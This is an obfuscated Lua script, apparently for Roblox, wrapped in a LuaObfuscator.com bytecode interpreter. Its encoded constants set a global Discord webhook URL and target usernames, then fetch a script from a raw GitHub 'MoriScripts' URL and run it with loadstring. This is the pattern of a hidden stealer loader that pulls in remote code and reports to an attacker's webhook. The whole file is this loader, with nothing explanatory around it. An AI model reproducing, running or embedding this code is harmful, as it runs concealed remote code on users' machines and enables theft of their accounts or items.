--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v87=v5(v82,v19);v19=nil;return v87;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/(2^(v32-(2 -1))))%(2^(((v33-(928 -((1279 -(68 + 997)) + 713))) -(v32-(1 + 0))) + (2 -1))) ;return v83-(v83%((1271 -(226 + 1044)) -0)) ;else local v84=(4 -2)^(v32-(620 -(555 + 64))) ;return (((v31%(v84 + v84))>=v84) and (932 -(857 + 74))) or (568 -(367 + 201)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (1 -0) + (353 -(87 + 263)) ;return (v40 * (16778173 -(892 + 65))) + (v39 * (156337 -90801)) + (v38 * (472 -216)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=181 -(67 + 113) ;local v44=(v20(v42,1 + 0 ,49 -29 ) * (((793 -(368 + 423)) + (0 -0))^(127 -95))) + v41 ;local v45=v20(v42,973 -(802 + 150) ,(101 -(10 + 8)) -52 );local v46=((v20(v42,57 -25 )==((3 -2) + 0)) and  -((1440 -(416 + 26)) -(915 + 82))) or (2 -1) ;if (v45==(0 + 0)) then if (v44==(0 -0)) then return v46 * (1187 -(1069 + 118)) ;else v45=2 -1 ;v43=0 -0 ;end elseif (v45==2047) then return ((v44==0) and (v46 * (1/(0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-(1817 -794) ) * (v43 + (v44/((2 + 0)^52))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;local v49={};for v65=1 + 0 , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0 -0 ;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v50==(77 -(71 + 3))) then v57=nil;v58=nil;v50=4;end if (v50==(2 + 0)) then v55=nil;v56=nil;v50=8 -5 ;end if (v50==(9 -5)) then while true do if (v51==2) then local v94=0 -0 ;while true do if (v94==0) then local v100=0;while true do if (v100==(1 + 0)) then v94=1 -0 ;break;end if (v100==(241 -(187 + 54))) then v56=nil;v57=nil;v100=781 -(162 + 618) ;end end end if (v94==(1 -0)) then v51=3 + 0 ;break;end end end if (v51~=(1 + 0)) then else local v95=0;local v96;while true do if ((0 + 0)==v95) then v96=0;while true do if ((0 + 0)==v96) then local v101=0 -0 ;while true do if (v101~=(0 -0)) then else v54=nil;v55=nil;v101=1 + 0 ;end if (v101==1) then v96=1637 -(1373 + 263) ;break;end end end if (v96==(1001 -(451 + 549))) then v51=4 -2 ;break;end end break;end end end if (v51==(7 -4)) then v58=nil;while true do local v98=0 -0 ;local v99;while true do if ((0 + 0)~=v98) then else v99=0 + 0 ;while true do if (v99==(1 -0)) then if (v52==0) then local v120=0;while true do if (v120==(0 -0)) then local v149=0;local v150;while true do if (v149~=(1384 -(746 + 638))) then else v150=0 + 0 ;while true do if (v150~=(0 -0)) then else local v167=341 -(218 + 123) ;while true do if (v167==(753 -(239 + 514))) then v53={};v54={};v167=1582 -(1535 + 46) ;end if (v167==(1 + 0)) then v150=1 + 0 ;break;end end end if ((1 + 0)~=v150) then else v120=561 -(306 + 254) ;break;end end break;end end end if (v120==(1 + 0)) then v55={};v52=1 + 0 ;break;end end end if (v52==(6 -3)) then local v121=0 -0 ;local v122;while true do if (v121~=(731 -(476 + 255))) then else v122=0;while true do if (v122==(1467 -(899 + 568))) then local v162=1130 -(369 + 761) ;while true do if (v162==(0 + 0)) then for v168=1 + 0 ,v23() do v54[v168-1 ]=v28();end return v56;end end end end break;end end end break;end if (v99==(0 -0)) then local v102=603 -(268 + 335) ;while true do if (v102~=(290 -(60 + 230))) then else local v148=0 + 0 ;while true do if (v148~=(573 -(426 + 146))) then else v102=1;break;end if (v148~=(0 + 0)) then else if (v52==(217 -(42 + 174))) then local v163=1456 -(282 + 1174) ;local v164;while true do if (v163==(811 -(569 + 242))) then v164=0 -0 ;while true do if (v164~=(0 + 0)) then else local v170=1504 -(363 + 1141) ;local v171;while true do if (v170==0) then v171=1024 -(706 + 318) ;while true do if (v171==(1251 -(721 + 530))) then v56={v53,v54,nil,v55};v57=v23();v171=1;end if (v171==(701 -(271 + 429))) then v164=1 + 0 ;break;end end break;end end end if (1~=v164) then else v58={};v52=1935 -(565 + 1368) ;break;end end break;end end end if (v52==(1502 -(1408 + 92))) then local v165=0;local v166;while true do if (v165==0) then v166=0;while true do if (v166==(1086 -(461 + 625))) then local v172=0;local v173;while true do if ((1288 -(993 + 295))~=v172) then else v173=0 + 0 ;while true do if (v173==(1 -0)) then v166=1172 -(418 + 753) ;break;end if ((0 + 0)==v173) then for v179=1,v57 do local v180=0 + 0 ;local v181;local v182;local v183;while true do if (0~=v180) then else local v189=0 + 0 ;while true do if (v189==(0 + 0)) then local v190=0 -0 ;while true do if (v190==(530 -(406 + 123))) then v189=1;break;end if (v190==(304 -(244 + 60))) then v181=1769 -(1749 + 20) ;v182=nil;v190=1 + 0 ;end end end if (v189==(1323 -(1249 + 73))) then v180=1 + 0 ;break;end end end if (v180==1) then v183=nil;while true do if (v181==(1146 -(466 + 679))) then if (v182==(1126 -(936 + 189))) then v183=v21()~=0 ;elseif (v182==(1 + 1)) then v183=v24();elseif (v182==(1616 -(1565 + 48))) then v183=v25();end v58[v179]=v183;break;end if (v181==0) then local v192=0 -0 ;while true do if (v192~=(2 -1)) then else v181=1901 -(106 + 1794) ;break;end if (v192==(0 + 0)) then local v194=0 + 0 ;local v195;while true do if (v194~=0) then else v195=0 -0 ;while true do if (v195~=(1138 -(782 + 356))) then else local v206=0 -0 ;while true do if (v206==(114 -(4 + 110))) then v182=v21();v183=nil;v206=1;end if (v206==1) then v195=585 -(57 + 527) ;break;end end end if (v195==(1093 -(975 + 117))) then v192=1428 -(41 + 1386) ;break;end end break;end end end end end end break;end end end v56[106 -(17 + 86) ]=v21();v173=1 + 0 ;end end break;end end end if (v166~=(3 -2)) then else for v174=1 -0 ,v23() do local v175=0 -0 ;local v176;local v177;while true do if (v175==(2 -1)) then while true do if (v176~=0) then else v177=v21();if (v20(v177,167 -(122 + 44) ,1 -0 )~=0) then else local v184=0 -0 ;local v185;local v186;local v187;local v188;while true do if (v184==2) then while true do if (v185==(0 -0)) then v186=v20(v177,2,3 + 0 );v187=v20(v177,4,1 + 5 );v185=2 -1 ;end if (v185==(1229 -(322 + 905))) then if (v20(v187,1 -0 ,66 -(30 + 35) )~=(1 + 0)) then else v188[1259 -(1043 + 214) ]=v58[v188[7 -5 ]];end if (v20(v187,1214 -(323 + 889) ,949 -(245 + 702) )==1) then v188[9 -6 ]=v58[v188[1 + 2 ]];end v185=7 -4 ;end if (v185==3) then if (v20(v187,3,583 -(361 + 219) )~=(3 -2)) then else v188[4 + 0 ]=v58[v188[4]];end v53[v174]=v188;break;end if (v185==1) then v188={v22(),v22(),nil,nil};if (v186==(0 + 0)) then local v202=0;local v203;while true do if (v202~=0) then else v203=413 -(15 + 398) ;while true do if (v203==(982 -(18 + 964))) then v188[3]=v22();v188[1 + 3 ]=v22();break;end end break;end end elseif (v186==1) then v188[3]=v23();elseif (v186==(7 -5)) then v188[3]=v23() -((1692 -(1121 + 569))^(10 + 6)) ;elseif (v186==3) then local v209=683 -(483 + 200) ;local v210;while true do if (v209==(1463 -(1404 + 59))) then v210=0;while true do if (v210~=(0 + 0)) then else v188[3]=v23() -(2^(43 -27)) ;v188[854 -(20 + 830) ]=v22();break;end end break;end end end v185=2 + 0 ;end end break;end if (v184~=1) then else v187=nil;v188=nil;v184=128 -(116 + 10) ;end if (v184~=(562 -(334 + 228))) then else v185=0;v186=nil;v184=3 -2 ;end end end break;end end break;end if (v175~=(0 -0)) then else v176=0 + 0 ;v177=nil;v175=739 -(542 + 196) ;end end end v52=1 + 2 ;break;end end break;end end end v148=1 -0 ;end end end if (v102==1) then v99=1 + 0 ;break;end end end end break;end end end break;end if (v51~=(0 + 0)) then else local v97=0 + 0 ;while true do if (v97==0) then v52=0;v53=nil;v97=1;end if (v97==(2 -1)) then v51=1 + 0 ;break;end end end end break;end if (v50~=0) then else v51=0 -0 ;v52=nil;v50=2 -1 ;end if (v50==(1552 -(1126 + 425))) then v53=nil;v54=nil;v50=407 -(118 + 287) ;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v86=0;while true do if (0==v86) then v79=v67[v71];v80=v79[1];v86=1;end if (v86==1) then if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80==0) then v71=v79[3];else local v104=v79[2];local v105=v77[v79[3]];v77[v104 + 1 ]=v105;v77[v104]=v105[v79[4]];end elseif (v80<=2) then do return;end elseif (v80>3) then v77[v79[2]][v79[3]]=v79[4];else v77[v79[2]]();end elseif (v80<=7) then if (v80<=5) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80>6) then local v126=v79[2];v77[v126]=v77[v126](v13(v77,v126 + 1 ,v72));else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=8) then v77[v79[2]]=v79[3];elseif (v80==9) then v77[v79[2]]=v61[v79[3]];else local v131=0;local v132;while true do if (v131==0) then v132=v79[2];v77[v132]=v77[v132](v13(v77,v132 + 1 ,v72));break;end end end elseif (v80<=15) then if (v80<=12) then if (v80>11) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else do return;end end elseif (v80<=13) then v77[v79[2]]=v79[3]~=0 ;elseif (v80==14) then v77[v79[2]][v79[3]]=v79[4];else local v136=0;local v137;local v138;while true do if (v136==1) then v77[v137 + 1 ]=v138;v77[v137]=v138[v79[4]];break;end if (0==v136) then v137=v79[2];v138=v77[v79[3]];v136=1;end end end elseif (v80<=18) then if (v80<=16) then local v112=v79[2];local v113,v114=v70(v77[v112](v13(v77,v112 + 1 ,v79[3])));v72=(v114 + v112) -1 ;local v115=0;for v117=v112,v72 do v115=v115 + 1 ;v77[v117]=v113[v115];end elseif (v80==17) then v77[v79[2]]();else local v139=0;local v140;local v141;local v142;local v143;while true do if (v139==2) then for v159=v140,v72 do v143=v143 + 1 ;v77[v159]=v141[v143];end break;end if (1==v139) then v72=(v142 + v140) -1 ;v143=0;v139=2;end if (v139==0) then v140=v79[2];v141,v142=v70(v77[v140](v13(v77,v140 + 1 ,v79[3])));v139=1;end end end elseif (v80<=19) then v71=v79[3];elseif (v80==20) then v77[v79[2]]=v61[v79[3]];else v77[v79[2]]=v79[3];end v71=v71 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31322O3134313336323936393033383932392F754B65374F6568774D42445F4173644F446E484A4B6B384A385A4762466F4C6971416D3339595A586238726F70772D344636507033646C397A585368574768576B703268030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503073O0032346B6870747103093O00557365724E616D653200173O0012083O00013O0026053O000E0001000200044O000E0001001209000100033O003004000100040005001209000100063O001209000200073O002001000200020008001208000400094O0006000500014O0012000200054O000A00013O00022O001100010001000100044O001600010026053O00010001000100044O00010001001209000100033O0030040001000A000B001209000100033O0030040001000C000B0012083O00023O00044O000100012O00023O00017O00",v9(),...);end
